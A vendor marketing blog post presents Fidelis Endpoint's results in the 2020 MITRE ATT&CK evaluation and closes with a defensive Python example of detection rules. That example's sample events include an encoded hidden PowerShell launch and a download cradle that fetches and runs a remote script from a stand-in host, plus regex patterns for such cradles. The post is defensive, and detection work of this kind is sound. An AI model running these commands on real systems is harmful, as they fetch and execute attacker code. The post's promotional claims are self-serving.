Fidelis Blog
Author: Ingrid Kambe, Vice President, Marketing

As Vice President of Marketing, Ingrid Kambe is responsible for the global marketing strategy and execution at Fidelis Cybersecurity. Her team helps bring cloud, network, and endpoint security products...

Fidelis Detects Adversary Tactics & Techniques Early and Often Across All Stages of the Attack Lifecycle in MITRE Engenuity’s 2020 ATT&CK® Evaluation

Fidelis Cybersecurity enables security teams to detect and engage adversaries earlier in the attack lifecycle with active defense solutions that provide full visibility and response options across endpoints, network and cloud. The MITRE Engenuity 2020 ATT&CK Evaluation bears this out: in its endpoint evaluation, Fidelis Endpoint EDR detected the emulated Carbanak and FIN7 cyber crime attacks early and often across all stages of the attack lifecycle, giving enterprises the opportunity to stop an attack before it causes damage.

Fidelis Endpoint detected activity across every attempted adversary tactic and the vast majority of ATT&CK techniques. Across the 20 discrete adversary steps and 174 sub-steps in the emulated attacks, Fidelis Endpoint EDR registered a detection 282 times, with coverage in all 20 steps. (The count exceeds the number of sub-steps because alerts, telemetry and tactic/technique tag enrichments are each counted; see "How should you interpret the results?" below.) Fidelis Endpoint is one key component of the Fidelis Elevate eXtended Detection and Response (XDR) platform, which helps organizations adopt an active defense posture and engage adversaries earlier in the attack lifecycle.

Newly Released ATT&CK Evaluations – Carbanak and FIN7

The MITRE ATT&CK framework is a widely adopted knowledge base of adversary tactics and techniques based on real-world observations. MITRE Engenuity regularly conducts product evaluations to provide transparency into how security products perform against known adversary behaviors.

MITRE Engenuity ATT&CK Evaluations are designed to help organizations systematically assess, test, and tune their defenses by replicating the tactics, techniques, and procedures of real threat groups. The 2020 round emulated the Carbanak and FIN7 adversaries. These financially motivated groups represent modern threat actors that affect organizations across many verticals: they use innovative tradecraft, stealth, espionage, and a wide variety of techniques and utilities to hide in plain sight and fully exploit their intended targets. This assessment validates the efficacy of a core component of Fidelis Elevate, an Active XDR platform.

Our ATT&CK Evaluation Journey

Fidelis Cybersecurity continuously stress tests our products to ensure that our customers are armed with the best defense possible. MITRE Engenuity testing provides third-party validation of how Fidelis Endpoint identifies malicious activity in real-world attack scenarios.

What malicious activity did Fidelis see and alert on?

Fidelis Endpoint (EDR) detected activity across every attempted adversary tactic and provided visibility and detections in every step of the evaluation. Fidelis adds enrichment tags to alerts and behavior telemetry that identify the tactic and technique per the MITRE ATT&CK framework.

How should you interpret the results?

During the evaluation, 174 attack sub-steps were performed as adversarial actions, and vendors were evaluated on the observed results. A detection could be an automated alert that carried a tag identifying the tactic or technique used in the sub-step. In many cases an alert is not the appropriate output, because the sub-step by itself is not indicative of malicious activity; in those cases the captured behavior data (telemetry) was evaluated to determine whether the sub-step could be identified by a data search or by tactic and technique tags. Because alerts, telemetry and tag enrichments were each counted, the Fidelis total of 282 detections exceeds the 174 sub-steps: a single sub-step can produce more than one detection.

It is important to recognize that adversaries have choices in their plan of attack. They do not follow a recipe leading to the same steps used in every campaign. This is why there are many possible steps and sub-steps. To interpret the results, consider these important aspects:

  • Ability to detect every major step and tactic. Fidelis detected 100% of the steps.
  • Concentrate on the early steps in the attack. Your goal is to detect early and respond before the adversary can achieve their mission. Fidelis achieved this goal.
  • Automate response. While response capability was not part of the evaluation, it is vitally important to prevent damage. Fidelis Endpoint can automate an enterprise-wide response based on many factors, including the enrichment tags for tactics and techniques.

What relevant context can Fidelis provide about the activity?

This third round of ATT&CK Evaluations emulated specific threat actors and the techniques they use after gaining initial access to an organization. While important, breach detection is only one part of a security posture; it is equally if not more important to implement controls that prevent breaches (preventive, protective, predictive, deceptive), as well as controls that limit the damage from breaches (forensics, response, data leakage prevention).

Fidelis Endpoint is a key component of the Fidelis Elevate platform. This Active XDR solution has been purpose-built for active defense strategies. Its focus is on engaging with and defeating adversaries earlier in the attack lifecycle while introducing cost, complexity, and confusion to the adversary. Fidelis Elevate XDR enables SOC analysts to quickly detect and block attacks, perform deep inspection/analysis of the environment to assess whether any systems have been compromised, and return impacted systems to normal business operations as quickly as possible. Fidelis’ Active XDR platform shifts the defense posture from passive alert monitoring to active engagement by combining deception technologies with detection and response for endpoint (EDR), network (NDR), and cloud. Traditional XDR solutions bring together telemetry into yet another data lake. In contrast, Active XDR from Fidelis uses telemetry to enhance SOC efficiency by helping to re-shape the attack surface and giving the SOC team the tools it needs to stop threats before the threats stop business.

How can ATT&CK Evaluations help defenders?

The test is designed to help enterprise analysts make informed decisions about specific use cases by giving them consistent context across vendor products to help evaluate vendors against real-world adversary scenarios. The test results can help assess:

  • Investigations and hunting: The tactic and technique enriched telemetry provides the forensics needed to do a hunt. The analyst should look at what tests were not detected. Specifically, they should see where they lie in the attack life cycle and any alternative coverage or improvements since the test.
  • Detecting advanced threats: The tool's rule engine, which uses the telemetry and the tactic and technique enrichments to produce detections, should let the analyst create rules as needed for the ever-changing threat landscape. It is also important to know what rules and threat coverage the vendor provides out of the box.

MITRE Engenuity’s evaluations are intended to share observations without awarding any scores, rankings or comparison. This creates room for different interpretations and can make results difficult to understand at a glance, since there is no “winner”, just raw data.

Summary

Fidelis Cybersecurity enables security teams to shift left to engage with adversaries earlier in the attack lifecycle using active defense solutions that provide full visibility and response across endpoints, networks, and cloud systems. The ATT&CK Evaluations focus on endpoint analysis capabilities, which is an important part of a security defense, but not the only need. In fact, Fidelis network and deception used in conjunction with Fidelis endpoint provides stronger conviction on attacks and further response options while introducing cost and confusion to adversaries. These additional XDR capabilities were not tested in this evaluation.

The Fidelis Endpoint release tested during the 2020 MITRE Engenuity ATT&CK Evaluations demonstrated exemplary detection capabilities. Since then, we have further enhanced Fidelis Endpoint with version 9.4, which introduces a new and improved detection rule evaluation system. It can combine pre-execution YARA rules, both binary signatures for executable content and textual pattern matching for script content, with behavior metadata to build complex and powerful detection rules. Detection rule actions were expanded to allow process blocking alongside alerting, and behavior data can be enriched with customizable, searchable classifiers, including MITRE technique and tactic identifiers. With the expanded YARA rule capability of Fidelis Endpoint 9.4, the detections in round three of the MITRE evaluation would have been considerably greater.
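To make concrete what combining content pattern matching with behavior metadata means in a detection rule, here is an added example; it is not Fidelis Endpoint code and does not use its rule format. It is a small Python evaluator in which each rule ANDs an optional content pattern (a regex standing in for a YARA textual rule over script content) with behavior constraints on the launching process, and a match yields both an action (alert or block) and ATT&CK tactic/technique tags of the kind the enrichment described above would carry. The rule names, event fields and sample events are constructed for illustration.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class ProcessEvent:
    """Behavior metadata captured for a process launch (constructed sample fields)."""
    image: str
    parent_image: str
    command_line: str
    script_content: str = ""  # script text inspected pre-execution, if any


@dataclass
class Rule:
    """One detection rule: optional content pattern AND behavior constraints.

    `content` stands in for a YARA textual rule over script_content; `behavior`
    maps an event field to a regex that must match. Every clause must match
    for the rule to fire. Hypothetical format, not a Fidelis rule.
    """
    name: str
    tactic: str
    technique: str
    action: str  # "alert" or "block"
    content: Optional[re.Pattern] = None
    behavior: Dict[str, re.Pattern] = field(default_factory=dict)


@dataclass
class Detection:
    rule: str
    action: str
    tactic: str
    technique: str


RULES: List[Rule] = [
    # Office application spawning PowerShell with an encoded command: block it.
    Rule(
        name="office_spawns_encoded_powershell",
        tactic="Execution", technique="T1059.001", action="block",
        behavior={
            "parent_image": re.compile(r"\\(winword|excel|powerpnt)\.exe$", re.I),
            "image": re.compile(r"\\powershell\.exe$", re.I),
            "command_line": re.compile(r"(?:^|\s)-(?:e|enc|encodedcommand)\s", re.I),
        },
    ),
    # Script content that fetches remote content AND evaluates it in-process: alert.
    Rule(
        name="script_downloads_and_invokes",
        tactic="Command and Control", technique="T1105", action="alert",
        content=re.compile(r"DownloadString\(|DownloadFile\(|Invoke-WebRequest", re.I),
        behavior={
            "image": re.compile(r"\\powershell\.exe$", re.I),
            "script_content": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
        },
    ),
]


def rule_matches(rule: Rule, event: ProcessEvent) -> bool:
    """A rule fires only when its content pattern (if any) and every behavior clause match."""
    if rule.content is not None and not rule.content.search(event.script_content):
        return False
    return all(pat.search(getattr(event, fld, "")) for fld, pat in rule.behavior.items())


def evaluate(event: ProcessEvent, rules: List[Rule] = RULES) -> List[Detection]:
    return [Detection(r.name, r.action, r.tactic, r.technique) for r in rules if rule_matches(r, event)]


def decide(event: ProcessEvent, rules: List[Rule] = RULES) -> str:
    """Most severe action across all matching rules: block > alert > allow."""
    actions = {d.action for d in evaluate(event, rules)}
    return "block" if "block" in actions else "alert" if "alert" in actions else "allow"


def enrichment_tags(event: ProcessEvent, rules: List[Rule] = RULES) -> List[str]:
    """Searchable tactic/technique classifier tags attached to the event's telemetry."""
    return sorted({f"{d.tactic}/{d.technique}" for d in evaluate(event, rules)})


# Constructed sample events; none are taken from the evaluation.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = {
    "encoded_from_word": ProcessEvent(
        image=PS, parent_image=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        command_line="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    "download_cradle_script": ProcessEvent(
        image=PS, parent_image=r"C:\Windows\explorer.exe",
        command_line="powershell.exe -ExecutionPolicy Bypass -File update.ps1",
        script_content="IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"),
    "admin_inventory": ProcessEvent(
        image=PS, parent_image=r"C:\Windows\explorer.exe",
        command_line="powershell.exe -File inventory.ps1",
        script_content="Get-Process | Sort-Object CPU -Descending | Select-Object -First 10"),
}

if __name__ == "__main__":
    for name, ev in SAMPLE_EVENTS.items():
        print(f"{name:24} {decide(ev):5} {enrichment_tags(ev)}")
```

The point of the AND between content and behavior clauses is precision: a download cradle in a script is far more suspicious when the process running it is PowerShell than when the same string appears in, say, a documentation file, and an encoded command line is worth blocking when its parent is an Office application but would generate noise if matched on its own. The tags returned by `enrichment_tags` are what an analyst would pivot on when hunting by tactic or technique.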

Stay tuned for our deep dive including recommended key things to look for to help you make the decision that is right for your organization’s situation, risk profile, needs, and expectations.

